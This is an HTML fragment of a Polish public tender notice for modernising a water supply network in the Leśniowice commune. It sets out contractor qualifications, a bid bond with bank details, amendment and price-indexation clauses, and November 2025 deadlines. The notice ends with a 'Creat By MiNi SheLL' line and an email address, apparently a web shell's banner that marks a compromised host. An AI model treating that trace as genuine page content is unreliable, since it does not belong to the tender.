class="normal">Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej w zakresie: Wykonawca winien wykazać, że 1. wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną, realizowaną w ramach jednej umowy (zamówienia) polegającą na budowie lub przebudowie lub rozbudowie sieci wodociągowej o długości sieci (bez przyłączy) co najmniej 0,500 km.<br/>2.	dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą niezbędne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. <br/>Zamawiający określając warunki w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2025 r. poz. 418) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2023 r. poz.334). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu dot. zdolności technicznej lub zawodowej Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>1)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (Wzór druku wykazu robót budowlanych stanowi załącznik nr 7 do SWZ) w odniesieniu do warunku określonego w pkt. 6.1.4 ppk1 SWZ.<br/><br/>2)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego zgodnie z załącznikiem nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przez Wykonawcę przedmiotowych środków dowodowych w tym zakresie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę skalda się na Formularzu ofertowym – zgodnie z Załącznikiem nr 3 do SWZ;<br/>2. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	Oświadczenia, o których mowa w rozdziale 8.1 SWZ z wykorzystaniem wzoru stanowiącego załączniki nr 4 i nr 5 do SWZ; <br/>2)	Oświadczenie, o którym mowa w rozdziale 8.2 SWZ (jeżeli dotyczy) z wykorzystaniem wzoru stanowiącego załącznik nr 6 do SWZ; <br/>3)	Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy);<br/>4)	Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a)	zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b)	wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>c)	jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. <br/>5)	Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>Pełnomocnictwo składa się, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje mocodawca. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany wnieść wadium w wysokości: 20 000 PLN (słownie: dwadzieścia tysięcy złotych 00/100), <br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>Bank Spółdzielczy w Leśniowicach nr rachunku 87 8195 0009 2001 0000 1948 0028 jako tytuł wpłaty należy wpisać z adnotacją „Wadium – Znak sprawy: GK.271.8.2025 Modernizacja sieci wodociągowej na terenie gminy Leśniowice”.<br/>4.	Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>6.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium,<br/>c)	termin ważności gwarancji/poręczenia formule: „od dnia .......– do dnia .........”,<br/>d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>7.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp.<br/>8.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. w takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenie o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdza brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3 ppkt 1) i 2) SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>3.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Oprócz przypadk.o których mowa w art.454i455 ust.PZP,strony dopuszcz. Możliw.wprowadz. zmiany um. w stosunku do treści oferty,na podstawie której dok. wyboru Wyk.,w przyp.wystąpienia którejkol. z nast. okoliczn:<br/>2)termin real.przed. um. może ulec przedłuż. o czas występ. przeszkód o obiektywnym charakt. (zdarzenia nadzwycz.,zewn. i niemożliwe do zapobieżenia,mieszcz. się w zakresie tzw.„siły wyższej,klęski żywiołowe” a także wprowadz. jednego ze stan.nadzwyczaj.stanu zagrożenia epidemiczn.,epidemii, pandemii),o ile okoliczn. związane z wystąp. ww. przeszkód miały wpływ na należyte w tym term. wyk. um.a także w przypadku wystąp. niekorzystn. war.atmosferycz.,które uniemożliw. prawidłowe wyk.zam.zgodnie z technologią,co zostanie udokument.poprzez .zapisy w Dzien.Bud.i potwierdz, przez Inspek.Nadz.,termin na wyk. um. może zostać wydłuż, o czas trwania przeszk.,uniemożliwiaj. Wyk.um.z zastrzeżeniem uwzględ.ewent. przyczynienia się Wyk. do wydłuż.,<br/>3)termin real.przedm. um. może ulec przedłuż. w przyp. wystąp. niewybuch.,wykopalisk archeol.,przy czym term. na wyk.um.może zostać wydłuż. o czas trwania przeszkody,<br/>4)termin real.przedm. um., może ulec przedłuż. w przyp.u wystąpienia kolizji z instalacjami wew.i zew.nieujawnion.w dok.proj.,lub innymi rob. Prowadz.przez innego wyk.,przy czym przedłużenie term. realiz. zamów. nastąpi o liczbę dni niezbędną Wyk. na usunięcie kolizji z instalac. wew. Nieujawnion.w dok.proj lub o liczbę dni niezbędnych do wyk.robót przez innego wyk. – o ile usunięcie kolizji wymagać będzie przedłuż. ter.realiz.;<br/>5)termin real. przedm.um. może ulec przedłuż. w przyp. wystąp. konieczności wprowadz. w dok.proj. zmian,powodujących wstrzym. lub przerw. robót budowl.,stanowiąc. przedm.zam. przy czym przedłuż. terminu realiz. zam. nastąpi o liczbę dni niezbędną do wprowadz. zm. w dok.proj. oraz do przeprowadz.uzgodnień .z właściwymi organ.,uzyskania opinii organ. oraz wydania dec. przez organy,przy czym wprowadz. w dok.proj. zmian nie może skutkować zwiększ.zakresu świadcz.Wyk.zawartego w ofercie, oraz zwiększ. wynagrodz.Wyk. <br/>6)term. real.przedm.um. może ulec przedłuż. w przyp. wystąp.warunków geolog.lub hydrolog. odmiennych od założonych w dok.proj. i powodując. konieczność wstrzym. robót lub konieczn. ich wyk. przy wykorzyst. odmiennych od zaproj. rozwiązań technicz.,przy czym przedłuż. term. real. zam.nastąpi o liczbę dni niezbędną do wyeliminow. utrudnień związanych z ich wystąp,<br/>7)termim real.przedm.um. może ulec przedłuż.w zakresie niezbęd. do wyk. robót zlec.na podst.art.455 ust.1pkt 1,3,4 lub ust.2 ust. PZP,<br/>8)zmiana term. wyk. zam. lub zakresu świadczeń lub sposobu wyk. zam. może nastąpić w przyp.zmiany powszechnie obowiązujących przep. Pr.w zakresie mającym bezpośredni wpływ na ter.realizacji przedm. zam. lub zakres świadczeń stron um. lub sposób jej wykonyw,<br/>2.W przyp. wystąpienia zmian osób przy pomocy,których Wyk,realizuje przedm. um.na inne spełniające warunki określ.w SWZ,zm. taka nie wymaga aneksu do um.<br/>3.Zmiany do um.następują na pisemny wniosek jednej ze stron wraz z uzasad. konieczn. wprowadz. tych zmian.Wniosek powinien zawierać co najmniej:<br/>1)dokładny opis prop. zmian;2)koszty zw. ze zm.i wpływ wyk. zm. na wynagrodz.;3)czas potrzebny dla wyk. zm. oraz jego wpływ na ustalony termin zak. Um. <br/>4.Określa się zasady wprowadz, zm.wysokości wynagr. w przyp.zmiany stawki podatku VAT oraz podatku akcyz.,jeżeli zmiany te będą miały wpływ na koszty wyk. zam. przez Wyk.Stawka i kwota podatku oraz wynagr. brutto ulegną zmianie odp. do przep, prawa wprowadzaj. zmianę stawki podatku,co oznacza,że Zam. dopuszcza możliw. zmniejsz.i zwiększ. wynagr. brutto o kwotę równą różnicy wynik.ze zmienionej stawki pod. – dot. to części wynagr. za roboty,których w dniu zmiany stawki podatku jeszcze nie wykonano.<br/>5.Str. wniosk. o zmianę wskazaną w ust.4 musi wykazać że zm.te mają bezpośredni wpływ na wysok.wynagr. Wyk.,tj.wykazać,że zmiany wymusz.podwyższ. kosztów wykonania.<br/>cd. w sekcj. Informacje dodatkowe <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-05 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy pod adresem: https://zamowienia-lesniowice.lubelskie.pl/#/offer/abae5cc2-beaf-4407-8822-688fdc1562e9</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-05 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> …cd. zmiany umowy<br/>6.Wyk. zobowiąz. jest w term. wskaz. przez Zam. przedłożyć Zam. na piśmie szczegół. analizę porów. kosztów (przed i po nowelizacji) stanowiącą wykaz poniesionych wyd. w zw. ze zmianą ww.przepisów z powołaniem się na stosowne przep.,z których wynikają ww.zmiany,a także przedł.konieczne dokumenty (w tym oświad. dla celów podatk.i ZUS).<br/>7.W przypadku wystąpienia okolicz.,o których mowa w ust.4 pkt 1) część wynagrodz.brutto Wykonawcy,.,płatna po zaistnieniu ww.okoliczności,ulegnie zmianie o wartość różnicy pomiędzy nową wart. podatku VAT (ustaloną w oparciu o stawkę pod.od tow. i usług po zmianie),a dotychczasową wart.podatku VAT(ustaloną w oparciu o stawkę pod. od tow. i usług przed zmianą).W takiej sytuacji wynagr. brutto będzie obejmowało stawkę i wartość obowiązującą w dniu wystawienia faktury.Wynagr. netto Wyk. nie ulegnie zmianie.<br/>8.Ciężar dowodu,że okoliczności wymienione w ust.4 pkt 1 mają wpływ na koszty wykonania zamówienia spoczywa na Wyk..<br/>9.Zm. wysokości wynagrodz.,o któr. mowa w ust.4 . um. mogą zostać dok. ze skutkiem nie wcześniej niż na dzień wejścia w życie przep.,z których wynik. te zmiany.<br/>10.Zm.,o których mowa w ust.4 mogą być dokonane tylko,jeżeli jest to niezbędne dla prawidł.wyk. um. 11.Zm. um. wymagają dla zach. swojej ważności formy pisemnej w postaci aneksu,pod rygorem nieważn. 12.Zam. może dokonać zmian w zawartej um. w przypadku wystąpienia okolicz.opisanych w art.455 ust.PZP<br/>Waloryzacja<br/>1.Zam. zgodnie z art.439 ust.1 ust.PZP określa zasady wprowadz. zmian wysok.wynagr.należnego Wyk.,w przypadku zmiany cen materiałów lub kosztów związanych z realiz. zam.<br/>2.	Przez zmianę ceny mater. lub kosztów rozumie się wzrost odp.cen lub kosztów,jak i ich obniżenie,względem ceny lub kosztu przyj. w celu ustal.wynagr. Wyk. zawartego w ofercie,o ile zmiany te będą miały wpł. na koszty wyk. przez Wyk.przedm. Um.<br/>3.Miernikiem zmiany ceny mater. lub kosz. zwiąż. z real. Um. jest wskaźnik cen produkcji budowl.– montaż. za dany kwartał w stosunku do poprzed. Kwart.ogłaszany w komunik. Prezesa GUS z zw. z art.17 ust.4 i 6 ust.z 2.04.2009 r.o zmianie ust. o poręczeniach i gwarancjach udziel. przez Skarb Państwa oraz niektóre osoby prawne,ust. o BGK oraz niektórych innych ustaw. <br/>4.Każda ze stron Um. uprawniona jest do żądania zmiany wysok.wynagr.Wykonawcy,gdy kwartalny wskaź. cen prod. budowl. – montaż. ogłoszony w ostatnim komunik. Prezesa GUS poprzedz. wniosek o walor.,wzroś./spadnie o co najmn. 5% w stos. do wysok. tego wskaź.w kwart.,w którym zawierana była um. a jeżeli zawarcie um. nastąpiło po upływie 180 dni od dnia upływu term. składania ofert,w stos. do wysok.i wskaź. w kwart.,w którym była składana oferta.<br/>5.Waloryz. może nastąpić nie wcześn. niż po 6 mies. od dnia zawar. Um.Walor. może być dok. raz w roku.<br/>6.Strona zainteres.walor. składa wniosek o dok.walor.wynagrodz. wraz z uzasad. wskaz. wysokość wskaź. oraz przedmiot i wartość robót podleg. walor. (niezrealiz. i nieodebr. przez Zam. do dnia złoż.a wniosku).<br/>7.Maks. wartość zmiany wynagr.,jaką dopuszcza Zam. w efekcie zastosow.postanowień o zasadach wprowadz. zmian wysok. wynagrodz. w zw. ze zmianą cen mater.lub kosztów związ. z realiz. zam. wynosi 15% wart. ceny ofertowej.<br/>8.W przyp. wzr./spadku wskaź.GUS w sposób określony w ust.1 pkt 2,walor. będzie polegała na wzr.obniżeniu wynagr. za roboty niezrealiz. i nieodebr.e przez Zam. do dnia złoż. wnios. o wartość procent. tego wskaź. lub ilocz. kolejno po sobie następ. wskaź. w poszczegól. kwart.przed datą złoż. wniosku.<br/>9.W przypadku gdy Str. dokonały ustaleń co do zmiany wysok. Wynagr.Wykonawcy,Strony zawrą aneks do umowy w term. wynik.z ustaleń,a w przypad.braku takich ustaleń – w term.e wyznacz.przez Zam..<br/>10.Wykon.,którego wynagr. zostało zmien.,zobowiąz. jest do zmiany wynagr. przysług. Podwyk.i odp. Podwyk. dalszemu Podwyk.,z którym zawarł um.,jeżeli łącznie spełnione są następ. warunki<br/>1)Przedm. um.są roboty budowl.,dostawy lub usł;<br/>2)Okres obowiąz. um. wraz z aneks. przekracza 6 mies.

Creat By MiNi SheLL
Email: jattceo@gmail.com